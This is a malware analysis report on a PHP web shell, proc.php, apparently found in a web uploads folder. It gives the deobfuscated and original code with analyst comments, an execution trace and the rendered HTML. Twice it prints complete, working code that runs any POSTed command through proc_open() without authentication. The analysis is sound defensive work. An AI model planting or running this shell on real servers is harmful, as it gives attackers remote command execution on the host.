PHP Malware Analysis

proc.php

md5: 52cccae2053e0b2587a909714050a3e3


Deobfuscated PHP code

<?php

// Analyst notes: this file is an unauthenticated web shell. It reports the
// PHP `disable_functions` setting to the requester, then runs whatever arrives
// in the POST parameter `cmd` through proc_open() and echoes the child's
// stdout back. No authentication, input validation or CSRF check exists
// anywhere in the file. Detection hints visible here: a POST body with a `cmd`
// field, proc_open() fed directly from $_POST, and the literal output string
// "disable func :".
print "\n";
// `@` hides any warning from ini_get(); the value is echoed raw (no escaping)
// on the next line, disclosing the hardening configuration to the requester.
$disable_functions = @ini_get("disable_functions");
echo "<font face=courier size=2>disable func : <i><font color=red size=2> " . $disable_functions;
print "\n";
?><br></font>
<form method="post">
<font face=courier new size=2>Command :</font> <input type="text" class="area" name="cmd" size="30" height="20" value="ls -la" style="margin: 5px auto; padding-left: 5px;" required><br>
<button type="submit">Execute</button>
</form><hr>
<?php 
// Pipe layout for proc_open(). Only $pipes[1] (stdout) is read below; index 2
// is declared ("pipe", "r") — the same direction as stdin — and is never read,
// so the child's stderr is not shown to the requester.
$descriptorspec = array(
    0 => array("pipe", "r"),
    // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),
    // stdout is a pipe that the child will write to
    2 => array("pipe", "r"),
    // declared like stdin; never read by this script
);
// Extra environment handed to the child process; the name and value look like
// filler and are not referenced anywhere else in the file.
$env = array('some_option' => 'aeiou');
// Passed as the cwd argument to proc_open() below. It is an empty string rather
// than null — NOTE(review): confirm how proc_open() treats "" as cwd.
$meki = "";
if (isset($_POST['cmd'])) {
    // Untrusted input: the raw POST value becomes the command line given to
    // proc_open() with no validation of any kind.
    $cmd = $_POST['cmd'];
    // Opens <table>/<td>/<textarea> that are never closed, because the script
    // ends with die below.
    echo "<table width=100%><td><textarea cols=90 rows=25>";
    // Return value is not checked for false, and the handle is never released
    // with proc_close().
    $process = proc_open($cmd, $descriptorspec, $pipes, $meki, $env);
    // Child stdout is echoed unescaped into the textarea; stderr is dropped.
    echo stream_get_contents($pipes[1]);
    die;
}
?>


Execution traces

data/traces/52cccae2053e0b2587a909714050a3e3_trace-1676246787.9622.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:06:53.860028]
1	0	1	0.000200	393512
1	3	0	0.000274	399184	{main}	1		/var/www/html/uploads/proc.php	0	0
2	4	0	0.000292	399184	ini_get	0		/var/www/html/uploads/proc.php	1	1	'disable_functions'
2	4	1	0.000309	399664
2	4	R			'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
1		A						/var/www/html/uploads/proc.php	1	$disable_functions = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
1		A						/var/www/html/uploads/proc.php	8	$descriptorspec = [0 => [0 => 'pipe', 1 => 'r'], 1 => [0 => 'pipe', 1 => 'w'], 2 => [0 => 'pipe', 1 => 'r']]
1		A						/var/www/html/uploads/proc.php	12	$env = ['some_option' => 'aeiou']
1		A						/var/www/html/uploads/proc.php	13	$meki = ''
1	3	1	0.000400	399632
			0.000425	317000
TRACE END   [2023-02-12 22:06:53.860282]


Generated HTML code

<html><head></head><body><font face="courier" size="2">disable func : <i><font color="red" size="2"> pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
<br></font>
<form method="post">
<font face="courier" new="" size="2">Command :</font> <input type="text" class="area" name="cmd" size="30" height="20" value="ls -la" style="margin: 5px auto; padding-left: 5px;" required=""><br>
<button type="submit">Execute</button>
</form><hr>

</i></font></body></html>

Original PHP code

<?php /* Analyst note: unauthenticated web shell; the `@` hides ini_get() warnings and the disable_functions value is echoed raw (no escaping) to the requester. See the comments in the second PHP block below. */ print "\n";$disable_functions = @ini_get("disable_functions"); echo "<font face=courier size=2>disable func : <i><font color=red size=2> ".$disable_functions; print "\n"; ?><br></font>
<form method="post">
<font face=courier new size=2>Command :</font> <input type="text" class="area" name="cmd" size="30" height="20" value="ls -la" style="margin: 5px auto; padding-left: 5px;" required><br>
<button type="submit">Execute</button>
</form><hr>
<?php
// Pipe layout for proc_open(). Only $pipes[1] (stdout) is read below.
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "r") // declared like stdin ("r"); $pipes[2] is never read, so stderr is not shown
);
// Extra environment handed to the child; name/value look like filler and are
// not referenced elsewhere in the file.
$env = array('some_option' => 'aeiou');
// Passed as the cwd argument to proc_open(); an empty string rather than null —
// NOTE(review): confirm how proc_open() treats "" as cwd.
$meki = "";
// Untrusted input: the raw POST value `cmd` becomes the command line for
// proc_open() with no authentication, validation or CSRF check.
if(isset($_POST['cmd'])){ 
$cmd = ($_POST['cmd']);
// Opens <table>/<td>/<textarea> that are never closed because of die below.
echo "<table width=100%><td><textarea cols=90 rows=25>";
// Return value not checked for false; handle never released with proc_close().
$process = proc_open($cmd, $descriptorspec, $pipes, $meki, $env);
// Child stdout echoed unescaped into the textarea; stderr is dropped.
echo stream_get_contents($pipes[1]); die; }
?>